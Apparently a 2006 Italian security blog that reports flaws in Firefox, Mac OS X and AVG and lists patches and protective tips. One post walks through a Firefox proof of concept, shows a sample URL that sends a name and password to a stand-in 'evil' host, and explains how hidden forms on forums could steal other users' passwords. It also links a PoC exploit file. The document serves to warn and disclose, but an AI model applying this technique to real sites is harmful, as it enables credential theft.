P4 Werterxyz

29 novembre 2006

Test degli antivirus – novembre 2006

Filed under: Antivirus — P4 Werterxyz @ 11:40

Test degli antivirus di novembre condotto da AV-Test http://av-test.org
http://www.pcwelt.de/news/sicherheit/64946/index.html

22 novembre 2006

Gravissima falla di sicurezza in Firefox 2.0 e 2.0.0.1 che permette ad un sito di rubare le password salvate

Filed under: Falle di sicurezza — P4 Werterxyz @ 11:56

E’ stata scoperta una gravissima falla di sicurezza in Firefox 2.0 e 2.0.0.1 che permette ad un sito web di rubare le vostre password che avete salvato.
Qui c’è un test dimostrativo: https://bugzilla.mozilla.org/attachment.cgi?id=245426
Dovete inserire in real name e in real password un nome ed una password che vi pare (per es. name=pippo e password=pluto), poi clickate sul pulsante real form. Quando Firefox vi chiede se volete salvare la password rispondete di si in modo che il nome utente e la password per il sito bugzilla.mozilla.org venga salvato. A questo punto si aprirà una nuova pagina; quindi tornate indietro nella pagina di prima e noterete che il nome utente e la password sono stati automaticamente inseriti nel fake form, infine premete sul pulsante fake form e vi si aprirà una nuova pagina sul sito maligno d’esempio evil.mozilla.com che vi mostra come sia riuscito a rubare il vostro nome utente e password del sito bugzilla.mozilla.org al sito evil.mozilla.com; compare il nuovo url http://evil.mozilla.com/stealpassword?name=pippo&password=pluto

  Password rubata

Ancora più grave è il fatto che la form fasulla può essere nascosta per esempio da una immagine o da un videoclip e quando l’utente clicka per vederlo, i dati nome utente e password vengono trasferiti da un sito ad un altro ad insaputa dell’utente, come dimostra quest’altro test: http://www.info-svc.com/news/11-21-2006/rcsr1/

Questo genere di attacco è facilmente sfruttabile anche nei forum web o blog da un utente qualsiasi che è in grado di sottrarre le password di tutti gli altri utenti, semplicemente postando un messaggio in HTML contenente la form nascosta e una immagine/videoclip che se clickata dagli utenti invia i dati verso il suo sito

UPDATE del 20 dicembre: E’ stato rilasciato Firefox 2.0.0.1 e risulta ancora vulnerabile a questa falla.

Meditate gente… Meditate…

Saluti da P4

21 novembre 2006

Gravissima falla di sicurezza in Mac OS X 10.4.8: esecuzione di codice arbitrario da remoto mediante file DMG

Filed under: Falle di sicurezza — P4 Werterxyz @ 17:04

E’ stata scoperta una gravissima falla di sicurezza in Mac OS X 10.4.8, in particolare in com.apple.AppleDiskImageController, che permette di eseguire codice arbitrario da remoto in kernel mode da utenti non-privilegiati (quindi c’è una scalata dei privilegi!) mediante l’apertura di file DMG appositamente creati ad hoc.
Questa falla è exploitabile da remoto attraverso il browser web Safari, aprendo un file DMG appositamente creato ad hoc presente su un sito web maligno; di default i file sicuri (e quindi anche DMG) vengono automaticamente aperti da Safari dopo il download.

PoC per chi vuole testare questa falla: http://www.digitalmunition.com/MOKB-20.dmg 

http://projects.info-pull.com/mokb/MOKB-20-11-2006.html
http://www.securityfocus.com/bid/21201/discuss

Al momento in cui scrivo, NON è disponibile alcuna patch.

Meditate gente… Meditate…

Saluti da P4

19 novembre 2006

Funzione Immunize di Spybot S&D inserisce un vasto numero di siti pericolosi nella lista dei Siti con restrizioni di IE7

Filed under: Antivirus — P4 Werterxyz @ 11:00

Non tutti sanno che con Spybot S&D è possibile, con un semplice click, "bloccare" in IE un vasto numero di siti pericolosi, inserendoli nella lista dei Siti con restrizioni:

1. Se non lo avete già, scaricate ed installate Spybot S&D dal sito ufficiale: http://www.safer-networking.org/en/download/index.html
2. Aggiornatelo clickando sul pulsante Search For Updates (Ricerca Aggiornamenti) all’interno del programma
3. Clickate sullo scudo blu Immunize (Immunizza). Ricordate di farlo per tutti gli account di Windows che avete e ogni volta che aggiornate Spybot S&D.

Se volete controllare cosa ha fatto Spybot S&D:
aprite IE e andate in Strumenti –> Opzioni Internet –> Protezione –> Siti con restrizioni –> clickate sul pulsante Siti per vedere la lista dei siti che Spybot S&D ha automaticamente aggiunto per voi.

Quando un utente naviga su sito percoloso che si trova inserito nell’area dei Siti con restrizioni, NON può scaricare o eseguire file pericolosi (per es. exe), eseguire o installare ActiveX, eseguire script, ecc. e quindi il sito pericoloso non può tentare di installare del malware sul PC dell’utente e l’utente non può, nemmeno volontariamente, scaricare dei file pericolosi da quel sito.

Usare IE7 rispetto ad altri browser è quindi vantaggioso da questo punto di vista, perchè con IE7 si è in grado di utilizzare la funzione Immunize di Spybot S&D che filtra i siti pericolosi.

Saluti da P4

17 novembre 2006

NEW Windows Media Player 11 Finale – v11.0.5721.5145 – Italiano

Filed under: Software per Windows — P4 Werterxyz @ 16:04

15 novembre 2006

NEW Macromedia Flash Player v9.0.28

Filed under: Software per Windows — P4 Werterxyz @ 11:18

Per disinstallare la versione precedente:
http://fpdownload.macromedia.com/get/flashplayer/current/uninstall_flash_player.exe
poi svuotare anche la cartella Flash in C:\WINDOWS\system32\Macromed\Flash altrimenti vi rimangono i vecchi files

Download per IE qui:
http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash
NB. Deselezionare la casellina della Yahoo toolbar altrimenti vi installa anche quella

Questa nuova versione risolve la falla di sicurezza relativa agli header HTTP di cui vi ho parlato qui: http://p4werterxyz.spaces.live.com/blog/cns!5303B6CC1AC175A6!193.entry
quindi siete tutti caldamente invitati ad installarla.

Saluti da P4

14 novembre 2006

NEW Patch di sicurezza per Windows XP SP2 – novembre

Filed under: Windows XP SP2 patch di sicurezza — P4 Werterxyz @ 18:37

Windows XP SP2
1) Aggiornamento della protezione per Windows XP (KB920213) – MSAgent
http://www.microsoft.com/downloads/details.aspx?FamilyID=c16e1607-f396-4113-89f6-1fe89ec54b6a&DisplayLang=it

2) Aggiornamento della protezione per Windows XP (KB923980)
http://www.microsoft.com/downloads/details.aspx?FamilyID=2f54258f-1071-467b-80a2-e4dbfc050667&DisplayLang=it

3) Aggiornamento della protezione per Windows XP (KB924270) – servizio Workstation
http://www.microsoft.com/downloads/details.aspx?FamilyID=f4c8e767-4ed2-4e36-aa43-612f3017efc7&DisplayLang=it

4) Aggiornamento della protezione per Internet Explorer 6 per Windows XP Service Pack 2 (KB922760)
http://www.microsoft.com/downloads/details.aspx?FamilyID=ea3ce61c-3a28-4777-9eef-1486bb483c4f&DisplayLang=it
NB. Siete caldamente invitati ad aggiornarvi a IE7 che è già stato rilasciato anche in italiano. Da questo momento in poi non mi occupo più di IE6

Inoltre se avete installato MSXML4 e/o MSXML6 dovete mettere anche:
Aggiornamento della protezione per MSXML4 e MSXML6
http://www.microsoft.com/downloads/details.aspx?FamilyID=24b7d141-6cdf-4fc4-a91b-6f18fe6921d4&DisplayLang=it
http://www.microsoft.com/downloads/details.aspx?FamilyID=9ae7f4e9-8228-4098-af71-49c35684c17e&DisplayLang=it

Saluti da P4

NEW Internet Explorer 7 – Finale – v7.0.5730.11 – Italiano

Filed under: IE7 — P4 Werterxyz @ 17:05

Gravissime falle di sicurezza in AVG Anti-Virus 7.1.406: esecuzione di codice arbitrario da remoto mediante file RAR e CAB

Filed under: Falle di sicurezza — P4 Werterxyz @ 15:44

Sergio Alvarez ha scoperto diverse gravissime falle di sicurezza in AVG Anti-Virus 7.1.406 (e versioni precedenti) che, a causa di un bug nel parsing dei file RAR e CAB (cattivo parsing), permettono di eseguire codice arbitrario da remoto, in seguito a un buffer overflow nell’heap.
http://secunia.com/advisories/22811/

La versione 7.1.407 di AVG Anti-Virus risolve queste gravissime falle di sicurezza, quindi chi utilizza AVG Anti-Virus è altamente invitato a scaricare l’ultima versione disponibile.

Saluti da P4

12 novembre 2006

Nessuna falla di sicurezza in PowerPoint 2003

Filed under: Falle di sicurezza — P4 Werterxyz @ 20:22

Il 13 ottobre avevo scritto:
"Neanche il tempo di rilasciare le nuove patch di sicurezza di ottobre per Office, che è stato reso pubblico un PoC di una nuovissima falla di sicurezza in PowerPoint 2003 (e versioni inferiori) che potrebbe permettere di eseguire codice arbitrario, quando un utente apre un file .ppt appositamente creato ad hoc.
E’ palese che chi ha scoperto la falla ha volutamente aspettato il patch day di ottobre prima di renderla pubblica subito dopo (e non è la prima volta che succede!), in modo da poter sperare che il rilascio di una patch risulti più tardi possibile (visto che il prossimo appuntamento con le patch di sicurezza per Windows è schedulato per il 14 novembre, salvo necessità di rilasciare una patch anticipata).
http://blogs.technet.com/msrc/archive/2006/10/12/poc-published-for-ms-office-2003-powerpoint.aspx"
In realtà, il 10 novembre dopo un’analisi più approfondita di questo bug da parte di Microsoft, si scopre che NON è una falla di sicurezza e che NON permette in alcun modo di eseguire codice arbitrario
http://blogs.technet.com/msrc/archive/2006/11/10/follow-up-information-on-weblog-posting-about-poc-published-for-ms-office-2003-powerpoint.aspx
"The short story is that this issue turned out to not be exploitable for remote code executionIt was a PowerPoint crashing bug not a PowerPoint security vulnerability"
Quindi chi ha scoperto il bug, NON solo ha aspettato apposta il patch day di ottobre per segnalarlo, ma ha anche spudoratamente mentito spacciando questo bug per falla, dato che non si tratta di una falla di sicurezza!

Meditate gente… Meditate…

Saluti da P4

Older Posts »

Crea un sito o un blog gratuitamente presso WordPress.com.